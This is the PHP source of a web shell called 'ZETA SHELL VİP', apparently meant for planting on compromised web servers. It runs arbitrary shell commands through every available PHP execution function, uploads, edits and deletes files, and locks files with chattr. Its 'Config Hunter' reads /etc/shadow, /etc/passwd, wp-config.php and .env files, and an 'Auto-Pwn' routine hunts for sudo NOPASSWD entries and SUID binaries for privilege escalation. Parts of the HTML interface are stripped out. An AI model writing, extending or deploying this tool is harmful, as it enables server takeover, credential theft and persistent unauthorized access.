ACCESS DENIED!

'); } } } yetkiKontrol($kullaniciAdi, $sifre); // --- Temel Helper Fonksiyonlar --- function formatSizeUnits($bytes) { /* ... önceki kod ... */ if ($bytes === false || $bytes === null) return '???'; if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { /* ... önceki kod ... */ $file = rtrim($file, '/'); $pos = strrpos($file, '.'); if ($pos === false) { return ''; } return substr($file, $pos + 1); } function perms_to_string($perms) { if ($perms === false || $perms === null) return '????'; $info = ''; // Dosya türü - TÜM SATIRLARIN SONUNDA ; OLDUĞUNDAN EMİN OLALIM! if (($perms & 0xC000) == 0xC000) $info = 's'; // Socket elseif (($perms & 0xA000) == 0xA000) $info = 'l'; // Symbolic Link elseif (($perms & 0x8000) == 0x8000) $info = '-'; // Regular elseif (($perms & 0x6000) == 0x6000) $info = 'b'; // Block special <-- Burası veya öncesi olabilir elseif (($perms & 0x4000) == 0x4000) $info = 'd'; // Directory elseif (($perms & 0x2000) == 0x2000) $info = 'c'; // Character special elseif (($perms & 0x1000) == 0x1000) $info = 'p'; // FIFO pipe else $info = 'u'; // Unknown // İzinler $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } // Fonksiyonun kapandığından emin olalım function encodePath($path) { return str_replace(array('/', '\\'), array('__SLASH__', '__BSLASH__'), $path); } function decodePath($path) { return str_replace(array('__SLASH__', '__BSLASH__'), array('/', '\\'), $path); } function runCommand($cmd) { /* ... önceki kod ... */ $output = ''; $error = ''; $ret_val = -1; if (function_exists('shell_exec')) { $output = shell_exec($cmd . ' 2>&1'); } elseif (function_exists('system')) { ob_start(); system($cmd . ' 2>&1', $ret_val); $output = ob_get_contents(); ob_end_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd . ' 2>&1', $ret_val); $output = ob_get_contents(); ob_end_clean(); } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $output_array, $ret_val); $output = implode("\n", $output_array); } elseif (function_exists('proc_open')) { $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); $ret_val = proc_close($process); if (!empty($error)) $output .= "\nSTDERR:\n" . $error; } else { $output = "proc_open failed."; } } else { $output = "Command execution functions are disabled."; } return array('output' => htmlspecialchars(trim($output)), 'retval' => $ret_val); } // --- PATH Belirleme --- $script_path = dirname(__FILE__); $doc_root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $script_path; $current_path = $script_path; if (isset($_GET['p'])) { $decoded_p = decodePath($_GET['p']); $resolved_path = @realpath($decoded_p); if ($resolved_path !== false && @is_readable($resolved_path)) { $current_path = $resolved_path; } elseif (@file_exists($decoded_p) && @is_readable($decoded_p)) { $current_path = $decoded_p; } else { $current_path = $script_path; $_SESSION['message'] = 'Geçersiz veya okunamayan yol!'; $_SESSION['message_type'] = 'error'; } } $current_path = str_replace('\\', '/', $current_path); if ($current_path !== '/') { $current_path = rtrim($current_path, '/'); } if (empty($current_path)) { $current_path = '/'; } define("PATH", $current_path); // --- İkon Fonksiyonu --- function fileIcon($file) { /* ... önceki kod ... */ $full_path = PATH . '/' . $file; $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp", "ico"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc", "flac"); $video = array("mp4", "mov", "avi", "mkv", "webm", "flv", "wmv"); $code = array("php", "phtml", "html", "htm", "css", "js", "py", "sh", "json", "xml", "sql", "c", "cpp", "java", "rb", "go", "swift", "kt", "tpl", "ini", "conf"); $archive = array("zip", "rar", "tar", "gz", "7z", "bz2", "xz"); $doc = array("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odt", "ods", "odp"); $ext = strtolower(fileExtension($file)); if (@is_dir($full_path)) return ' '; if ($file == "error_log") return ' '; if ($file == ".htaccess" || $file == ".htpasswd" || $file == "config" || strpos($file, '.conf') !== false || strpos($file, '.ini') !== false) return ' '; if (in_array($ext, $code)) return ' '; if (in_array($ext, $imgs)) return ' '; if (in_array($ext, $audio)) return ' '; if (in_array($ext, $video)) return ' '; if (in_array($ext, $archive)) return ' '; if (in_array($ext, $doc)) return ' '; if ($ext == "txt" || $ext == "md" || $ext == "log") return ' '; return ' '; } // --- POST ve GET İşlemleri --- $message = isset($_SESSION['message']) ? $_SESSION['message'] : ''; $message_type = isset($_SESSION['message_type']) ? $_SESSION['message_type'] : ''; unset($_SESSION['message'], $_SESSION['message_type']); $action_result_output = ''; // Komut, analiz vb. çıktılar için // GET İşlemleri if ($_SERVER['REQUEST_METHOD'] === 'GET') { /* ... önceki GET işlemleri ... */ if (isset($_GET['chmod']) && isset($_GET['file'])) { /* chmod */ $file_to_chmod = PATH . '/' . urldecode($_GET['file']); $new_perm = intval($_GET['chmod'], 8); if (file_exists($file_to_chmod)) { if (@chmod($file_to_chmod, $new_perm)) { $_SESSION['message'] = 'Perms set to ' . sprintf('%o', $new_perm) . '!'; $_SESSION['message_type'] = 'success'; } else { $_SESSION['message'] = 'Error: Chmod failed!'; $_SESSION['message_type'] = 'error'; } } else { $_SESSION['message'] = 'Error: File not found!'; $_SESSION['message_type'] = 'error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } if (isset($_GET['chattr']) && isset($_GET['file'])) { /* chattr */ $file_to_chattr = PATH . '/' . urldecode($_GET['file']); $attr_cmd = $_GET['chattr'] == 'lock' ? '+i' : '-i'; $command = "chattr " . $attr_cmd . " " . escapeshellarg($file_to_chattr); $cmd_result = runCommand($command); if (stripos($cmd_result['output'], 'Operation not permitted') === false && stripos($cmd_result['output'], 'No such file') === false && stripos($cmd_result['output'], 'command not found') === false && $cmd_result['retval'] <= 1) { $_SESSION['message'] = 'chattr ' . $attr_cmd . ' attempted.'; $_SESSION['message_type'] = 'success'; } else { $_SESSION['message'] = 'Error: chattr failed: ' . $cmd_result['output']; $_SESSION['message_type'] = 'error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } if (isset($_GET['d']) && isset($_GET['file'])) { /* delete */ $item_to_delete = urldecode($_GET['file']); $item_path = PATH . "/" . $item_to_delete; $success = false; $error_msg = 'Unknown error!'; if (!file_exists($item_path)) { $error_msg = 'Item not found!'; } elseif (is_file($item_path)) { if (@unlink($item_path)) { $success = true; $msg = 'File deleted!'; } else { $error_msg = 'File deletion failed!'; } } elseif (is_dir($item_path)) { if (@rmdir($item_path)) { $success = true; $msg = 'Directory deleted (empty)!'; } else { $error_msg = 'Directory deletion failed (not empty/perms)!'; } } if ($success) { $_SESSION['message'] = $msg; $_SESSION['message_type'] = 'success'; } else { $_SESSION['message'] = 'Error: ' . $error_msg; $_SESSION['message_type'] = 'error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } if (isset($_GET['dl']) && isset($_GET['file'])) { /* download */ $file_to_download = urldecode($_GET['file']); $file_path = PATH . "/" . $file_to_download; if (!is_file($file_path)) { $_SESSION['message']='Error: Not a file!'; $_SESSION['message_type']='error'; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif (!is_readable($file_path)) { $_SESSION['message']='Error: Cannot read file!'; $_SESSION['message_type']='error'; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } else { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file_path) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file_path)); @ob_clean(); @flush(); @readfile($file_path); exit; } } if (isset($_GET['read_config'])) { /* read config */ $config_file = ''; $common_configs = array( 'passwd' => '/etc/passwd', 'shadow' => '/etc/shadow', 'wpconfig' => PATH . '/wp-config.php', 'wpconfig_up' => dirname(PATH) . '/wp-config.php', 'env' => PATH . '/.env', 'env_up' => dirname(PATH) . '/.env', 'apache_conf' => '/etc/apache2/apache2.conf', 'nginx_conf' => '/etc/nginx/nginx.conf', 'php_ini' => php_ini_loaded_file() ?: '/etc/php/php.ini' ); if (isset($common_configs[$_GET['read_config']])) { $config_file = $common_configs[$_GET['read_config']]; } $config_content = @file_get_contents($config_file); if ($config_content !== false) { $action_result_output = "--- Content of " . htmlspecialchars($config_file) . " ---\n\n" . htmlspecialchars($config_content); } elseif (!empty($config_file)) { $action_result_output = "Error: Cannot read " . htmlspecialchars($config_file); } else { $action_result_output = "Error: Unknown config file requested."; } } } // POST İşlemleri if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST["upload"])) { /* ... Upload logic ... */ if(isset($_FILES["fileToUpload"]) && $_FILES["fileToUpload"]["error"] == UPLOAD_ERR_OK) { $target_file = PATH . "/" . basename($_FILES["fileToUpload"]["name"]); if (!@is_writable(PATH)) { $_SESSION['message']='Hata: Dizin ('.htmlspecialchars(PATH).') yazılamıyor!'; $_SESSION['message_type']='error'; } elseif (@move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { $_SESSION['message'] = htmlspecialchars(basename($_FILES["fileToUpload"]["name"])).' yüklendi!'; $_SESSION['message_type']='success'; } else { $upload_error = $_FILES["fileToUpload"]["error"]; $_SESSION['message']='Hata: Yüklenemedi! (Error: '.$upload_error.')'; $_SESSION['message_type']='error'; } } else { $upload_error = isset($_FILES["fileToUpload"]["error"]) ? $_FILES["fileToUpload"]["error"] : 'Unknown'; $php_upload_errors = array( UPLOAD_ERR_INI_SIZE=>'php.ini size limit', UPLOAD_ERR_FORM_SIZE=>'Form size limit', UPLOAD_ERR_PARTIAL=>'Partial upload', UPLOAD_ERR_NO_FILE=>'No file', UPLOAD_ERR_NO_TMP_DIR=>'No tmp dir', UPLOAD_ERR_CANT_WRITE=>'Cannot write', UPLOAD_ERR_EXTENSION=>'PHP Extension stop'); $error_message = isset($php_upload_errors[$upload_error]) ? $php_upload_errors[$upload_error] : 'Unknown upload error.'; $_SESSION['message'] = 'Hata: ' . $error_message . ' (Code: ' . $upload_error . ')'; $_SESSION['message_type']='error'; } header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif (isset($_POST['rename'])) { /* ... Rename logic ... */ $original_path = PATH . "/" . $_POST['original_name']; $new_path = PATH . "/" . $_POST['new_name']; if (!file_exists($original_path)) { $msg='Hata: Orijinal bulunamadı!'; $type='error'; } elseif ($original_path === $new_path) { $msg='İsimler aynı!'; $type='info'; } elseif (@rename($original_path, $new_path)) { $msg='Yeniden adlandırıldı!'; $type='success'; } else { $msg='Hata: Adlandırılamadı! İzin?'; $type='error'; } $_SESSION['message'] = $msg; $_SESSION['message_type'] = $type; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif(isset($_POST['edit'])) { /* ... Edit logic ... */ $filename = PATH."/".$_POST['file_to_save']; if (!is_writable($filename)) { $msg='Hata: Hala yazılamıyor!'; $type='error'; } else { $data = $_POST['data']; if(@file_put_contents($filename, $data) !== false) { $msg='Kaydedildi!'; $type='success'; } else { $msg='Hata: Kaydedilemedi!'; $type='error'; } } $_SESSION['message'] = $msg; $_SESSION['message_type'] = $type; header('Location: ?p=' . urlencode(encodePath(PATH))); exit; } elseif(isset($_POST['run_command'])) { $cmd = $_POST['command']; $cmd_result = runCommand($cmd); $action_result_output = $cmd_result['output']; } elseif(isset($_POST['analyze_system'])) { /* ... System Analyze logic ... */ $analysis_output = "--- OS/Kernel Info ---\n"; $analysis_output .= runCommand('uname -a')['output'] . "\n"; $os_release = @file_get_contents('/etc/os-release'); $analysis_output .= ($os_release ?: runCommand('cat /etc/issue')['output']) . "\n"; $analysis_output .= "--- Sudo Version ---\n"; $analysis_output .= runCommand('sudo -V 2>&1')['output'] . "\n"; $analysis_output .= "--- SUID Binaries ---\n"; $analysis_output .= runCommand('find / -perm -4000 -type f -ls 2>/dev/null')['output'] . "\n"; $analysis_output .= "\n--- SUGGESTIONS ---\n"; $analysis_output .= "* Check kernel on exploit-db / searchsploit.\n"; $analysis_output .= "* Check sudo version for vulns (e.g., Baron Samedit).\n"; $analysis_output .= "* Analyze SUID bins using GTFOBins.\n"; $analysis_output .= "* Run 'sudo -l'.\n"; $action_result_output = $analysis_output; } elseif(isset($_POST['attempt_autopwn'])) { /* ... Auto Pwn Logic ... */ $pwn_output = "--- Attempting Auto-Pwn --- \n"; $pwn_output .= "[+] Checking 'sudo -l'...\n"; $sudo_l = runCommand('sudo -l 2>&1')['output']; $pwn_output .= $sudo_l . "\n"; if (stripos($sudo_l, 'NOPASSWD:') !== false && stripos($sudo_l, 'may run the following commands') !== false) { $pwn_output .= "[!] Potential NOPASSWD sudo found! Check allowed commands!\n"; } else { $pwn_output .= "[-] No obvious NOPASSWD sudo found.\n"; } $pwn_output .= "[+] Checking common SUID exploits (basic)...\n"; $suid_bins = array('nmap','find','vim','cp','mv','bash','more','less','nano','awk'); foreach($suid_bins as $bin) { $find_cmd = "find / -name ".$bin." -perm -4000 -type f -print 2>/dev/null"; $found = runCommand($find_cmd)['output']; if (!empty($found)) { $pwn_output .= "[!] Found SUID binary: ".$found." (Check GTFOBins for '".$bin."')\n"; } } $pwn_output .= "[-] Basic SUID checks finished.\n"; $pwn_output .= "\n--- Auto-Pwn Attempt Finished --- \n"; $action_result_output = $pwn_output; } } // POST sonu ?> ZETA SHELL VİP<?php echo $SHELL_VERSION; ?> [DEBUG]

'.$message.'

'; endif; ?>

Upload to ' . htmlspecialchars(PATH) . '

'; } elseif (isset($_GET['r']) && isset($_GET['file'])) { /* Rename Form */ $item_to_rename = urldecode($_GET['file']); echo '

Rename: ' . htmlspecialchars($item_to_rename). '

'; } elseif (isset($_GET['e']) && isset($_GET['file'])) { /* Edit Form */ $file_to_edit = urldecode($_GET['file']); $file_path = PATH . "/" . $file_to_edit; echo '

'; if (!is_file($file_path)) { echo '

Hata: Dosya değil!

'; } elseif (!is_readable($file_path)) { echo '

Hata: Okunamıyor!

'; } elseif (!is_writable($file_path)) { echo '

Uyarı: Yazılamıyor!

'; $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo '

Viewing: ' . htmlspecialchars($file_to_edit) . '

' . $content . '

'; } else { $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo ''; } echo '

'; } $show_file_manager = false; } // Dosya Yöneticisi if ($show_file_manager) { if (!is_dir(PATH)) { echo '

Hata: Dizin değil! Path: ' . htmlspecialchars(PATH) . '

'; } elseif (!($scan = @scandir(PATH))) { echo '

Hata: Dizin okunamadı! (' . htmlspecialchars(PATH) . ')

'; } else { // Dosya/Klasör listeleme tablosu... $folders = array(); $files = array(); foreach ($scan as $obj) { if ($obj == '.' || $obj == '..') continue; $full_obj_path = PATH . '/' . $obj; if (@is_dir($full_obj_path)) { array_push($folders, $obj); } else { array_push($files, $obj); } } usort($folders, 'strcoll'); usort($files, 'strcoll'); echo ''; foreach ($folders as $folder) { $folder_path = PATH . "/" . $folder; $perms = @fileperms($folder_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $mtime = @filemtime($folder_path); $mtime_str = ($mtime === false) ? '???' : date("Y-m-d H:i:s", $mtime); $perms_readable = perms_to_string($perms); $file_encoded = urlencode($folder); $path_encoded_url = urlencode(encodePath(PATH)); echo ""; } foreach ($files as $file) { $file_path = PATH . "/" . $file; $perms = @fileperms($file_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $size = @filesize($file_path); $size_str = ($size === false) ? '???' : formatSizeUnits($size); $mtime = @filemtime($file_path); $mtime_str = ($mtime === false) ? '???' : date("Y-m-d H:i:s", $mtime); $perms_readable = perms_to_string($perms); $file_encoded = urlencode($file); $path_encoded_url = urlencode(encodePath(PATH)); echo ""; } echo "

Name	Size	Modified	Perms	Actions
" . fileIcon($folder) . "" . htmlspecialchars($folder) . "	[DIR]	" . $mtime_str . "	" . $perms_str . "	\| \|
" . fileIcon($file) . htmlspecialchars($file) . "	" . $size_str . "	" . $mtime_str . "	" . $perms_str . "	\| \|

"; } } ?>

Execute Command

Output:

System Info & Exploit Helper

Analysis / Attempt Result:

Search Exploit-DB Check GTFOBins

Reverse Shell Helper

Config Hunter

Attempt to read common configuration files: